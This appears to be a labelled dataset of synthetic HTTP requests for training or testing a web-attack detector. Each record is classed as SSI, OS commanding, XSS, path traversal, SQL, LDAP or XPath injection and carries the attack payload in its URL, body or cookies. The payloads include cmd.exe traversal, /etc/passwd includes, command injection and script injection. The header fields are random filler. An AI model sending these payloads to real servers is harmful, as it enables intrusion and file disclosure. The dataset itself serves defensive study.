UA-CPU: x86
UA-Disp: 4437,742,16
UA-OS: Solaris
UA-Pixels: 6001x2247
Via: 19g/1.8 www.ssheta.shtml, 5.5 27.199.70.159
Transfer-Encoding: nptae
Upgrade: 0eadh/9.5, oyzasn/0.3, ulmsi7/4.4, bdhaod/9.0, riJn/7.4
Warning: 634 www.yauedif.css:99300 "eQn3Xdra5ghbItoas" 
X-Forwarded-For: 69.186.228.89
~~~~~: ~~~~~~~~~~

null

End - Id: 48071
Start - Id: 40396
class: SSI
PUT /rdzyecker9zin/swhADiA3yr0MGpGRs_N/t5h1pB0aQCDyqzqH/at6ytrx8tjlgSnatdr/tofgR7gc2phu2/sscmeeosdmItta2s6/dKrsz.hbEI0Z3uxJdubW/eQWWRSd.css? HTTP/1.1
Content-Length: 257
Content-Language: xed
Content-Encoding: identity
Content-Location: /scrwhod/edSs.txt
Content-MD5: Tmx1dWR3blVUYzNlSGhlVA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 01 May 09 04:06:04 UTC
Last-Modified: Thu, 05 Nov 09 23:43:43 UTC
Host: 27.35.206.182:14
Connection: keep-alive
Accept: text/*, audio/basic
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-store
Cookie: rjebjv1ci=hl7;ndefah4efA=aanD0Ehllutcl;i2G%uxcMY=f%24Dt%28mocha
Date: Thu, 15 Jan 09 10:07:04 UTC
ETag: "M6AcYIJM.NEE1MM"
If-Modified-Since: Wed, 21 Jan 04 10:15:48 GMT
If-None-Match: "5SdyTB56Xusv-C.fULwo"
Max-Forwards: 3450
Pragma: s9b=enotS0tn
Authorization: Digest nonce
Referer: http://www.iitr.st/rhhea.php3
User-Agent: Mozilla/4.4 (X11; U; Linux i386 9.2; 0p-va; rv:3.6.0) Gecko/84193234
UA-CPU: x86
Transfer-Encoding: gzip
X-Forwarded-For: 24.137.231.7

tV9passthruvar=45267&cphttpZ@=d<\6w&toLhnytij=a%u/ 3izhhisrE&b0t6vrrw=1&elto=<!-- #include    virtual="d:\windows\autoexec.bat"  -->&oo=hperlimg&o3nja=oceaqu0reP&r5ieodttgp=iaaptsntum&FFjscopyy=neh;+i e&Asfn=43619425&tE=nasse

End - Id: 40396
Start - Id: 36582
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .exe? HTTP/1.0
Host: 249.165.206.237
Connection: close
Accept: audio/*;q=0.6, application/*;q=0.5, image/*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: nhs-fGt
Cache-Control: no-cache
Client-ip: 252.39.154.149
Cookie: idinclude7x8=L B:connect;lcdjFhttpstC=ngchUlyC_;iyroa=11769525
Cookie2: $Version="3"
Date: Mon, 21 Feb 05 08:46:04 UTC
ETag: W/"ii87XQjje42GUbBHrDr"
Expect: 100-continue
From: osNAoh@aHn2nry.de
If-Modified-Since: Thu, 26 Mar 09 02:12:14 UTC
If-Unmodified-Since: Fri, 19 Mar 10 09:16:26 CET
If-Match: *
If-None-Match: *
If-Range: "YkdFyFmR4vc.Sz8ebw"
Max-Forwards: 98
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic ZU9ib2k6aG1yOA==
Range: 603-731460,2527-,65-
Referer: http://siznojg8.uk/traadzn.dll
TE: trailers,deflate
Trailer: If-Modified-Since
User-Agent: EonSo6a3e/9.1.4.2.1
UA-CPU: PowerPC
UA-Disp: 380,5893,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: 9.3 www.pghfza.png
Transfer-Encoding: identity
Upgrade: oydd2/7.5, cesu/3.1, vbera/4.9, vrl7/8.1
Warning: 353 98.201.134.39 "fe2bemhte" 
X-Forwarded-For: 50.37.241.255
X-Serial-Number: 8032084316017934872
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36582
Start - Id: 47517
class: XSS
GET /FZhomeKYunionKI-P/tivsuqTr/OzVS0RdivFCv/Sg/c1AihT2PRo7w4IPMqj/aUYaA/Isx1pqQZLbinLUpO/exoaorfnau.php4?ti9oels=pLEMg&nrjen7din7=+%3E&hbsLaanbwiitylF=oFkyHnXVbY&lsaa=oth-i&avt7stecRerdgx=%7E&replace15.ps9gclocation=+heleh&PlDE65-uyHG=133&robcarparado=6phtaccesiaosscriptiun+p&Nsacmetaxhz3d=4306084694&xheUAYdotohRe=tIfcl++%22+++++style%3Dleft%3Aexpression%28alert++%28%22++++6.e+%22%29%29+++++alt++%3D++++%22&ey40wses7tao=003&cltiiunitRlreTt=825556&bfKSabNzsam=7078878&J@ClBO=ss%3A8llTv9iTslinkd%3Ein%3C&frfE6Seieaoth=93055 HTTP/1.0
Host: 100.29.252.123
Connection: hifuvac
Accept: application/*;q=0.0, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ea35-in, tat-irmmi;q=0.9, erwnit06-ahtehol, tr6-os0E;q=0.7, sa-sjmd6;q=0.4
Cache-Control: rn5='ovVaha'
Client-ip: 2.40.61.206
Cookie: yHvMk=ishvhh\opta3e
Cookie2: $Version="7"
Date: Wed, 04 Aug 04 20:31:03 GMT
ETag: "zubBZp.p71Br16Td"
Expect: 100-continue
From: eudn2a@se5tse.com
If-Modified-Since: Fri, 02 Jun 06 23:46:46 CET
If-Unmodified-Since: Thu, 06 Apr 06 14:37:26 CET
If-Match: "GtXlpG9O2ov-7RCxd"
If-None-Match: "4SpxioGT6a-3xTdUAB"
If-Range: *
Max-Forwards: 768
MIME-Version: 9.4
Pragma: es=ssini
Proxy-Authorization: solli r3h4i=aotni1
Authorization: NTLM M0xpZWUxb0JjeGhmbG96NHBoaWN0d295QW0xcGFuc3I=
Range: -53,788-6
Referer: /iweo5/dls2eo.pl
TE: gzip;q=0.6,deflate;q=0.8,trailers
Trailer: Range
User-Agent: qhyltEmi6caoiirysnoe
UA-CPU: PowerPC
UA-Disp: 017,391,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7841x155
Via: 7.7 114.224.208.33
Transfer-Encoding: identity
Upgrade: atsa/8.3
Warning: 065 134.123.203.94 "ntssttrkginowelli" 
X-Forwarded-For: 178.21.22.223
X-Serial-Number: 870651819
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47517
Start - Id: 45048
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.0
Host: 163.137.22.65
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Client-ip: 0.96.11.108
Date: Wed, 02 Feb 05 17:00:10 UTC
Expect: 100-continue
From: Otai@40ezesm.uk
If-Modified-Since: Sat, 01 Dec 07 15:54:58 CET
If-Unmodified-Since: Thu, 02 Mar 06 17:06:53 UTC
If-None-Match: *
If-Range: *
Max-Forwards: 87
Authorization: Basic cmFpYWllb2M6RG9lb09kdDc=
Referer: http://tyrhunh.fr/sinpn/cogs/elexenrS/zteto1i/dy3a.tiff
User-Agent: medrwtado (s_shlE)
UA-CPU: PowerPC
UA-Disp: 7777,3718,16
UA-OS: Windows 95
UA-Pixels: 147x245
Transfer-Encoding: gzip
Upgrade: sLa/4.9
Warning: 905 80.144.212.89 "cvcWhwiseqlaaOni" "Wed, 28 Jan 09 19:24:15 UTC"
X-Forwarded-For: 33.238.34.199
X-Serial-Number: 986205312934896
----: ----------------------------

null

End - Id: 45048
Start - Id: 43593
class: OsCommanding
GET /3VtjWueP/j8IxahadrYixGusNdtl/ikPSujP2XEcAp8/sh/nw63iEE.b.asmx?httpsymSd0=7012030794&ssoDlreehy3=ikv4Fi0PL&euethioifhtrdZ=87&iNk=ddfjVxp-qdq&taonte3=%7Cecho++%22+++Content-Type%3A+text%2Fhtml%22+++++%3B++++echo++++%22%22++%3B+++id++++%5C0&ynncue=07848 HTTP/1.1
Host: www.6ccfnh.st
Connection: esVgn
Accept: */*;q=0.6
Accept-Charset: windows-1255, iso-8859-6
Accept-Encoding: compress;q=0.2, deflate, deflate, deflate
Accept-Language: *
Cache-Control: max-stale=6
Client-ip: 128.51.142.118
Cookie: 6oane=ef1_NvnJGK
Cookie2: $Version="7"
Date: Wed, 03 Jun 09 07:47:49 GMT
ETag: "4k2b-aFzaYNwu5THDb"
Expect: gtmnl0e=x4oheja
From: uiaeltm@8ehtblt.biz
If-Modified-Since: Mon, 22 May 06 14:29:25 CET
If-Unmodified-Since: Thu, 10 Dec 09 16:17:30 CET
If-Match: *
If-None-Match: "PrDDuqcxo03A.BA0"
If-Range: Fri, 11 Nov 05 02:54:53 UTC
Max-Forwards: 7
MIME-Version: 6.7
Pragma: o='arb'
Proxy-Authorization: gJons gtoaie=6vpernh8
Authorization: ldOc awt3rle=wsrwh
Range: 0756-,6170-,99043-471
Referer: /oaeerIe.aspx
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.6 (Windows; U; Win 9x 2.5; oe-pi; rv:6.2.8) Gecko/77899154
UA-CPU: PowerPC
UA-Disp: 084,5683,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 279x772
Via: HTTP/4.5 www.TssWz.tiff:645, HTTP/3.6 25.172.71.120, 8.7 4.202.76.11
Transfer-Encoding: gzip
Upgrade: wyme/7.1
X-Forwarded-For: 142.88.116.166
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43593
Start - Id: 39371
class: SSI
GET /rcns4otntnnfao2ro/LstWhril9bTanlca2/nenaN7ikug/92E9keEW-Q4.jsp?lislerteatIt=084348724&sebr98meMsw=142937869&3S3s9eennmbulld=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&ogo9eyst=etw HTTP/1.0
Host: www.lStumerts.be
Connection: close
Accept: image/*;q=0.3, audio/x-wav, video/mpeg
Accept-Charset: iso-8859-5, x-mac-chinesetrad
Accept-Encoding: compress, deflate;q=0.6
Accept-Language: *
Cache-Control: no-cache
Client-ip: 186.197.175.198
Cookie: xhonfh3lWa=owQGP2rYXL7o
Cookie2: $Version="92"
Date: Tue, 12 Aug 08 09:21:08 UTC
ETag: "M6Z8.Nnc9peS.SgsaJ"
Expect: 100-continue
From: ztifisTh@itMb.uk
If-Modified-Since: Mon, 28 Jan 08 20:38:38 GMT
If-Unmodified-Since: Sun, 01 May 05 07:58:35 CET
If-Match: "p1yHeFT9Dtrw-Mj"
If-None-Match: "ItNHGv2j75thLlL5-"
If-Range: Wed, 20 Feb 08 08:46:09 UTC
Max-Forwards: 7
MIME-Version: 1.1
Pragma: eorttIst='te'
Proxy-Authorization: Basic em5ldHNsZTplTXRuT3Jvdg==
Authorization: Digest nonce
Range: 396191-323,-9
Referer: http://oulw.biz/zrolh/16bua/3atzak.js
TE: chunked,deflate,deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/1.4 (compatible; Konqueror/4.5; Linux i586; r3sweass7o; EWdnhoe6rr; aey3)
UA-CPU: 68000
UA-Disp: 755,3991,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3402x217
Via: 9.8 91.2.152.197, haroe/1.8 146.171.90.74, FTP/6.0 www.fslhrtal.htm:92215
Transfer-Encoding: identity
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 190 47.240.214.57 "eTmefeexEnteh0llLor" "Fri, 17 Feb 06 05:54:12 UTC"
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 687226920
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39371
Start - Id: 39630
class: SSI
GET /i6RO/xCXz.dll?Hd6o=hesndetoria&s6tcete=etih3adfenr&4ets=zU.&9metseTr7hr=tidh-frh2e9f&eaRalqesie2amR=e&satyuiyeT67e=tEH6W3&eeovi=+dy&8toD1tenlatrh=%3C%21--+++%23include++virtual%3D%22%2Fetc%2Fpasswd%22+--%3E&7estune=axeas&xHD7lbftpB4=850609&uhieetu=tZHDB%40 HTTP/1.1
Host: 245.31.24.35
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1252
Accept-Encoding: *;q=0.7
Accept-Language: dtekrxi-tict;q=0.6, sl-iXcri, rs2wopi5-n7nro, mtoer-aeTmtkez;q=0.3, Uhohopeo-rse;q=0.2
Cache-Control: max-stale=527
Client-ip: 79.170.36.207
Cookie: o2ouvbei=MbeEcrtm;gin5seh=2713;ldcua4Ylw=almsolrcpY4at;bdRnt=8
Cookie2: $Version="9"
Date: Wed, 07 Nov 07 01:20:54 CET
ETag: "@Py@vCbgWDBllPns"
Expect: 100-continue
From: nneTpp@ds2o4khd.org
If-Modified-Since: Wed, 24 Mar 04 21:53:15 CET
If-Unmodified-Since: Sun, 04 Apr 04 07:28:32 CET
If-Match: "_SLt8K4i53beQ2dK5"
If-None-Match: *
If-Range: "1tBDwK1AmirrXI9L"
Max-Forwards: 6214
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic MklyaW46dHI1dDV6b3A=
Authorization: eaiie 8oiF=aChthh
Range: 973-,-4,32221-
Referer: /tpneobu/igqy.js
TE: gzip;q=0.5
Trailer: Cache-Control
User-Agent: 7@fKCpWmV- http://www.emmex.net
UA-CPU: PowerPC
UA-Disp: 0993,069,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1841x260
Via: FTP/4.6 22.244.227.174
Transfer-Encoding: identity
Upgrade: Eyls/5.9, r7a/3.5, emaet9/3.7, Got/3.4
Warning: 475 125.51.35.41 "LSrhe" 
X-Forwarded-For: 48.154.117.69
X-Serial-Number: 963759141034519657
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39630
Start - Id: 43702
class: OsCommanding
GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.h6ap9Epo.com
Connection: keep-alive
Accept: image/*
Accept-Charset: *;q=0.4
Accept-Encoding: compress, compress;q=0.0, gzip;q=0.2
Accept-Language: e3-a;q=0.9, GdgOee-tgm;q=0.2, ipismk-nsap, egrerir-etm
Cache-Control: max-stale=58
Client-ip: 152.233.157.213
Cookie: ns4e=90853;dEeceetomm1albr=iuEPGH3yutU;1winntTPPv9TBlikemgroup by=aJf;llups=UzOiaer
Cookie2: $Version="916"
Date: Mon, 28 Jun 04 18:27:42 CET
ETag: "-4D7Jo4QjAO6o6dlRPcD"
Expect: 100-continue
From: nnlogc@ewfasl3.ch
If-Modified-Since: Sun, 13 May 07 06:37:05 GMT
If-Unmodified-Since: Tue, 27 Apr 10 06:11:31 UTC
If-Match: *
If-None-Match: *
If-Range: "ayE5StEBc5.RGeB-K"
Max-Forwards: 09
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: csat8 fle0=tohc
Authorization: Digest nc=D9942BcD
Range: 63-,-3595
Referer: http://www.sjnrj.ch/ct47w/jwasi/restuei/twrM3aU/0uonrm.tar.gz
TE: deflate;q=0.6,gzip;q=0.4,trailers
User-Agent: 1stt/2.8.7.0
UA-CPU: 68000
UA-Disp: 911,720,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5641x613
Via: 2.6 115.72.82.89, ofnN/5.0 120.196.83.9
Transfer-Encoding: gzip
Upgrade: HweTi/0.0, tten/3.8, hSbn/1.3, sniu/8.5, tfxay/0.5
Warning: 708 148.220.94.123 "t7popsifwheZr" 
X-Forwarded-For: 253.164.33.60
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43702
Start - Id: 48583
class: XPathInjection
PUT /sPMJaUbodyMinput/fgdEbaisehb7/BFservicesP7.dll? HTTP/1.1
Content-Length: 400
Content-Language: oie
Content-Encoding: identity
Content-Location: http://esmoL.net/t35sli/uorKhs/fkhal0g.tar.gz
Content-MD5: NnJsZUxDbHlpYU5tME9pZA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 02 May 07 03:48:24 GMT
Last-Modified: Sun, 20 Mar 05 05:32:34 GMT
Host: www.9n99x.com
Connection: keep-alive
Accept: text/plain;q=0.3, text/plain;q=0.7, application/*
Accept-Charset: *
Accept-Encoding: compress;q=0.9
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 58.151.109.14
Cookie: c6ino=hTyohhnohh;nezahmuacoFdcae=TyasOm;9PechoElXD=uhsw&)Ta-;itmissyeLnnot=ygbAou..I1wQ;eore=s@I3cW.qd07;gAK8passthru8328Es=77752
Cookie2: $Version="380"
Date: Mon, 31 Oct 05 18:31:49 UTC
ETag: "pn9FUh6eD1tnxJb11"
Expect: giwPt=dOet;rlrwiz=tf8E
From: ebiq@eeIse.it
If-Modified-Since: Fri, 14 Jan 05 12:59:00 GMT
If-Unmodified-Since: Tue, 16 Jun 09 15:20:14 CET
If-Match: "ckqYw.luhGme_eVql"
If-None-Match: "n5MjbkQWHOFfv-aE0ND"
If-Range: Wed, 30 Jul 08 18:43:05 UTC
Max-Forwards: 4186
MIME-Version: 2.8
Pragma: 8=rhc
Proxy-Authorization: dlghi ebtehms=idn6ijs
Authorization: Basic N2V6cjphZXVxaWk3
Range: -13,5-
Referer: /oeteo/jveapt.mdb
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.9 (compatible; MSIE 3.0; Windows NT; kqlll; aecDeysie)
UA-CPU: StrongARM
UA-Disp: 2986,5659,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 316x0903
Via: 2.1 201.150.192.104, FTP/2.0 142.91.43.5
Transfer-Encoding: ctoo
Upgrade: xRgntq/5.9, 80qw6/9.4, rSdi/2.7, ttopmd/4.9
Warning: 003 60.71.243.7 "olt7lttIl5tS" "Mon, 09 Jun 08 19:36:33 GMT"
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 7270498522514093
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lsh=copyoaTrrtpsscriptet&nhaeacudhnRa=hly-2&eogelTt=n3UGtLe&eletofloPkns=hwUz-p&ueysYetR5sp2ir=i<aa6&sock_streamWzdPzhZaGxmlX=1195&iuee= llb4&ddaddyE=thfes/Eeostdinb&yoel6aeteEvrn=999361580&CsomX=sock_stream)1caccess_loghuuhthec&yyvftphtpasshome=|betweenbt &xp__3O77httpGERt=ewhp'    or     6     < count(path/child::*)    or    'ngij1rvi'=    '&han5ucEnty8s=9gjjRtNAfd7

End - Id: 48583
Start - Id: 42538
class: SqlInjection
GET /el8nad0Cebrinyol/ie7lHAwetasdemft8.jpg?Snmmoatenri=e&0u=2838&d67xllrhtimV=%27+OR+%27uSoaonwule%27+++++%3D+++++N%27+++++&lihaoeosgiek=itcid1agovbNni&Hoadgoii=hui1 HTTP/1.1
Host: 225.48.63.99
Connection: shmml
Accept: application/postscript
Accept-Charset: koi8;q=0.1
Accept-Encoding: compress, gzip
Accept-Language: iihu-masrast
Cache-Control: only-if-cached
Client-ip: 144.73.242.147
Cookie: boomtieotjeie=32870588;nrnntl=ta;PzliRt=b63
Cookie2: $Version="76"
Date: Tue, 06 Apr 04 20:41:18 CET
ETag: "YaiKF0rmASDK-26T"
Expect: rpe2
From: bs1as@pton6i0pc.org
If-Modified-Since: Sat, 26 Nov 05 21:59:05 GMT
If-Unmodified-Since: Tue, 21 Apr 09 01:33:47 CET
If-Match: "OdKa-wpU2-1m6YB"
If-None-Match: *
If-Range: Wed, 20 May 09 24:21:17 UTC
Max-Forwards: 5
MIME-Version: 3.7
Pragma: vncfeta=jgrxinin
Proxy-Authorization: Basic YWVzZWV2RzpodTFo
Authorization: Digest algorithm=MD5
Range: 79786-446
Referer: /aov5/sddeaeI/Upnjmmo/hoe0C.php4
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: Mozilla/1.4 (Windows; U; Windows NT 0.8; 5l-6l; rv:2.8.8) Gecko/30601506
UA-CPU: x86
UA-Disp: 1092,0849,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: 3.9 www.inolmAu.css, 9.6 162.16.131.228, 0.4 www.ss3o.jpg
Transfer-Encoding: compress
Upgrade: e2torm/4.8, rnb/5.6, cpieM/3.1, alfi/8.5
Warning: 787 15.186.185.51 "wdceb" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 49861
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42538
Start - Id: 38568
class: LdapInjection
GET /anabnocuagouLwp/ZNeYbgsoundXVXlvxs-/ovvTDYxc26x/etnq4inim9soDraino/m3AZ/2vTW6_l5wyP08Kl5/2mHb/ObVc7IwK2v/tVmQwNo.KL9H@1.htm?2i=%29+++%28%7C++%28cn%3D*o+%27brien*++++%29%28mail+++%3D*o%27brien*+++%29++++ HTTP/1.1
Host: www.Eyahca8u.it
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1252, ks_c_5601-1987;q=0.4, x-mac-cyrillic;q=0.5
Accept-Encoding: gzip;q=0.0, deflate;q=0.8, gzip, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 33.219.241.182
Cookie: souahretje=gciSNfUmfdeiidc
Cookie2: $Version="55"
Date: Thu, 14 May 09 16:25:34 CET
ETag: "Xn6bLNl6HcqYn2A"
Expect: 100-continue
From: rdtaepw@enuD8ssxt.biz
If-Modified-Since: Thu, 25 Aug 05 15:15:54 UTC
If-Unmodified-Since: Thu, 17 Feb 05 13:10:06 CET
If-Match: *
If-None-Match: "BNtd1GtYzlqGBTQP8"
If-Range: *
Max-Forwards: 64
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic bGVhY286c3RvcnNz
Authorization: NTLM dXFDeWhpc3RvbnNqbWVhaml6eTZkbGdzVGl0Y050ZmQyaHJvaXNoTm9vYQ==
Range: -5
Referer: http://y4hfvrSb.ch/whhz.exe
TE: trailers,chunked
Trailer: Accept
User-Agent: Mozilla/9.3 (Windows; U; Windows NT 9.7; yr-am; rv:7.8.6) Gecko/93681732
UA-CPU: 68000
UA-Disp: 9162,3647,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6483x132
Via: FTP/8.9 117.115.247.103, HTTP/6.4 147.250.225.235
Transfer-Encoding: compress
Upgrade: iintzo/8.2
Warning: 605 www.aElte.jpg "smttlahhNbrou8r" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 0288802054604644545
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38568
Start - Id: 43852
class: OsCommanding
GET /msadc/..���../..���../..���../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: www.3horw44N.uk
Connection: mh0HaR
Accept: */*;q=0.9
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: rew8-m8t, irmdH-dtTtvi, eb-d, tc-TeeiTrzp
Cache-Control: no-store
Client-ip: 9.232.251.46
Cookie: CvD_=se;Medtaz=793;sNert=ix.I1JDzj3k;3reiehktcibzeiM=ena
Cookie2: $Version="07"
Date: Thu, 12 Aug 04 16:41:38 CET
ETag: W/"77rk5N1JK52-rQYG"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Mon, 16 May 05 22:17:20 GMT
If-Unmodified-Since: Mon, 26 Jan 09 01:21:56 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 1.9
Pragma: bihxnush=Ohhelo
Proxy-Authorization: Digest cnonce="tRstaerb"
Authorization: Basic b2VUdXNldDpyMzVzOXM=
Range: 064373-124259,214-265,801-679
Referer: http://www.ndscata.net/5ltdw/to6itfh/eLEtas8/emw1cde.exe
TE: chunked;q=0.4
Trailer: User-Agent
User-Agent: qdB8_v http://www.titslee2.cz
UA-CPU: PowerPC
UA-Disp: 5599,048,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 629x1097
Via: 1.6 www.niou.png:6
Transfer-Encoding: deflate
Upgrade: hnohEn/1.3, he2eEw/1.1, bncL/6.8, m2jzg/1.9, jtxSa/2.3
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43852
Start - Id: 43931
class: OsCommanding
GET /PBServer/..��../..��../..��../winnt/system32/cmd.exe?/c+dir+c:0 HTTP/1.0
Host: www.ttb4esa.gov:6
Connection: close
Accept: */*
Accept-Charset: cp-936;q=0.0, iso-2022-kr;q=0.4
Accept-Encoding: 
Accept-Language: Rw-qttwrEt;q=0.1, hj-lnOhm;q=0.0, oxnnn-j
Cache-Control: min-fresh=465
Client-ip: 234.178.200.227
Cookie: e7aisVn=2+likes;i7uenEDwtton=Aa;sanitoamo88fsa=iHN@vJ0D;djaduoilsh=itdc;Pdrop7cQIE_4=2129515;dsnMt=4722494930
Cookie2: $Version="99"
Date: Tue, 13 Apr 10 21:04:35 GMT
ETag: W/"Rnf8Nocsx.lyafl8cCYu"
Expect: Hqscnnpi
From: lwml7nN@otm7kisnc.cz
If-Modified-Since: Wed, 02 Jul 08 01:27:41 UTC
If-Unmodified-Since: Mon, 12 Apr 10 12:24:17 GMT
If-Match: *
If-None-Match: "ysMR.zfJLfC@VBlM"
If-Range: "@OEafrKW4_aXCdtzo"
Max-Forwards: 2772
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: ohlp koeeoec=6ohc
Range: 080946-24031
Referer: http://www.4rEe.de/aoneh/dpeeat/nmlw.avi
TE: gzip
Trailer: If-None-Match
User-Agent: 05oPkLquMS http://www.qtle4be.fr
UA-CPU: StrongARM
UA-Disp: 9151,3536,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 428x0275
Via: 1sai2/3.1 105.125.16.244, HTTP/3.1 68.249.181.44, 4.0 www.alnl.css:41524
Transfer-Encoding: gzip
Upgrade: ehl/0.1, iwT/4.5, eeajn/7.4
Warning: 590 204.118.91.69 "eitd3dnkcep3Sina3" 
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43931
Start - Id: 35764
class: XPathInjection
GET /Iotbcp/0heFrhnFs0Nd/lmU/P@I4.swf?attsfqstcislW=mhtLt9tu&otC1Bhad4i4im=euEdr%26tj%2Bpa&Aewf=zjKMF5Y&axIthaD=80374&ctee=%28i+++++%3C+++++count%28Endip%2Fchild%3A%3Atext%28%29%29++and++++j++++%3C+++++count%28Hlb1%2Fchild%3A%3Acomment%28%29%29+++and++k+++++%3C+++count%28sBav%2Fchild%3A%3A*%29+++%29&ogws5esr=%7Estaccept2anfsqx+%3Dzh+r%2Bi HTTP/1.1
Host: www.oExeufsp.com
Connection: close
Accept: application/*;q=0.6, application/postscript;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: identity, deflate;q=0.4, deflate;q=0.0, deflate
Accept-Language: *
Cache-Control: min-fresh=44617
Client-ip: 75.114.245.20
Cookie: U24O=4c;8lcrnfiaId1vfb=bOw2GkcHWm;gbafeayrnera=25;Ocrbebamilni=683675;oioo9smba7sft=6309254;-8Kift=23
Cookie2: $Version="2"
Date: Sun, 26 Sep 04 13:50:50 GMT
ETag: W/"tsvQDtbvV-90U6TPs"
Expect: 100-continue
From: an4poes@ktzh.com
If-Modified-Since: Thu, 02 Aug 07 08:53:55 UTC
If-Unmodified-Since: Sun, 18 Mar 07 21:09:12 GMT
If-Match: *
If-None-Match: "v2EW69CIUg3iNHIfe92O"
If-Range: Tue, 07 Aug 07 16:39:37 GMT
Max-Forwards: 865
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic b2ltZWJ0Z006eGU3Nmg=
Range: 9042-41
Referer: http://www.unhnei.gov/E2s7r/dir7oi/Dzmdbe/dsaudt/boLnek.jpg
TE: chunked;q=0.0,gzip;q=0.5,deflate;q=0.8
Trailer: If-None-Match
User-Agent: Mozilla/1.0 (Machintosh; U; PPC 8.0; na-y2; rv:1.1.3) Gecko/90401396
UA-CPU: x86
UA-Disp: 8135,7731,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 6100x360
Via: 4.1 207.52.93.23, 7.9 www.np0i.js
Transfer-Encoding: s4oia
Upgrade: inuOi/4.6, b70ue/5.1
Warning: 145 165.132.233.207 "niz6ueo" "Sun, 02 Mar 08 13:20:23 UTC"
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 040193563593
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35764
Start - Id: 47576
class: XSS
GET /iHhTlse.swf?8Syitnk=%3Cbgsound++++src+%3D++++%22+++javascript%3A%5Balert++%28%27rsee1wk%27%29%3B%5D++++%22%3E&rgazuDawurafy=8407575&uo7aoioreilo=03 HTTP/1.0
Host: 200.27.67.150
Connection: HDn3y6
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 118.106.166.150
Cookie: eEamfRiuea=rye;Yb=ecmd;etKYn=85882759;NgxunionfwyrFu=r0nrtoabuamx;y6Pdl=eps;V2Kselect_f=in
Cookie2: $Version="36"
Date: Wed, 18 Apr 07 11:50:59 GMT
ETag: W/"ykYpVFv4o2eRsz_1U"
Expect: ih1treV=Hro8bc;fphyedn=8usRht
From: we7o1cGs@2OwoTmtOk.com
If-Modified-Since: Sun, 20 Feb 05 12:55:03 UTC
